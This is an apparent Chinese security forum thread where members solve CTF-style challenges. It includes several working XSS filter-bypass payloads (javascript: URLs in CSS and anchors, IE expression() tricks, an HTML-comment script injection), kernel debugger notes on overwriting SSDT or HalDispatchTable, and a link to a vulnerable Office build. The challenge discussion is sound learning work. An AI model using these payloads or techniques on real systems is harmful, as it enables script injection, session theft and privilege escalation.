能力值:
( LV12,RANK:210 )
|
-
-
26 楼
lkd> dd kiservicetable L4
80502bbc 8059aa74 805e8820 805ec066 805e8852
lkd> !pte 80502bbc
VA 80502bbc
PDE at C0602010 PTE at C0402810
contains 00000000004001E3 contains 0000000000000000
pfn 400 -GLDA--KWEV LARGE PAGE pfn 502
我虚拟机里面启用了PAE,SSDT也是可写的。
蓝屏的话那还是写HalDispatchTable吧
|
能力值:
( LV2,RANK:10 )
|
-
-
27 楼
请问第一题究竟要输入什么东西才不会被过滤呀?"<>全都被过滤掉了
|
能力值:
( LV12,RANK:270 )
|
-
-
28 楼
对于第五题,给一个下载链接,可以尝试一下,直接安装后不需要安装升级补丁,测试基本可以正常触发漏洞~
http://big.102.xdowns.com/o/frtx_office2003.rar
额~网络资源,自愿下载,对于任何后果,概不负责哦~
|
能力值:
( LV17,RANK:1820 )
|
-
-
29 楼
我去下载试下!!!
|
能力值:
( LV2,RANK:10 )
|
-
-
30 楼
第一题,不仅<>被过滤了,单引号、双引号都被过滤了。
|
能力值:
( LV17,RANK:1820 )
|
-
-
31 楼
第一题:
在“原始内容“中输入:style=background-image:url(javascript:alert(/xss/.source))/*
在“加密密钥”中输入19个以上的字符,比如“A”。
第二题:
各浏览器通用:<a href=javascript:alert('xss')>XXX</a>
|
能力值:
( LV2,RANK:10 )
|
-
-
32 楼
云里雾里的绕啊
|
能力值:
( LV2,RANK:10 )
|
-
-
33 楼
哇塞,第一题看了半天明白了,泉哥牛。但是泉哥如何知道“加密密钥”中输入19个以上的字符会将p属性后边的引号覆盖掉呢?
|
能力值:
( LV17,RANK:1820 )
|
-
-
34 楼
得天神助才知道的!
你乱输一通,可能一个不小心就发现了,呵呵……
|
能力值:
( LV2,RANK:10 )
|
-
-
35 楼
第一题IE6上可以,IE7不行。我说我昨天试了弄了半天弄不出来!
|
能力值:
( LV2,RANK:10 )
|
-
-
36 楼
还是对泉哥膜拜中,昨天想了一晚上没想出来怎么绕够引号过滤....
|
能力值:
( LV2,RANK:10 )
|
-
-
37 楼
IE8也不可以,会有跨站提示:
"Internet Explorer has modified this page to prevent cross-site scripting"
|
能力值:
( LV12,RANK:310 )
|
-
-
38 楼
膜拜泉哥,学习了
泉哥第二题的答案需要再点击才能触发脚本啊,这个算跨成功了吗?
|
能力值:
( LV2,RANK:10 )
|
-
-
39 楼
第一题的这个好像IE6能通过,IE9我试了没通过。我估计题目本意可能是IE6过就算成功了
第二题这个需要点击好像不太好
|
能力值:
( LV2,RANK:10 )
|
-
-
40 楼
第二题我查到一个html注释的xss,IE9,firefox4都能过的
<!----!><script>alert('xss');</script>
chrome好像会检查运行的脚本是否包含在url或post的内容里,需要改一下
<!----!><script>alert('xss'); "-->"<img><!----!></script>
|
能力值:
( LV2,RANK:10 )
|
-
-
41 楼
第一个问题,网上查到用expression据说能过IE7,不过没有测试
原始内容:
style=x:expression(p?(alert(p.slice(0,3)),p=0):0);
加密密钥:
xsspadding1padding2
|
|
|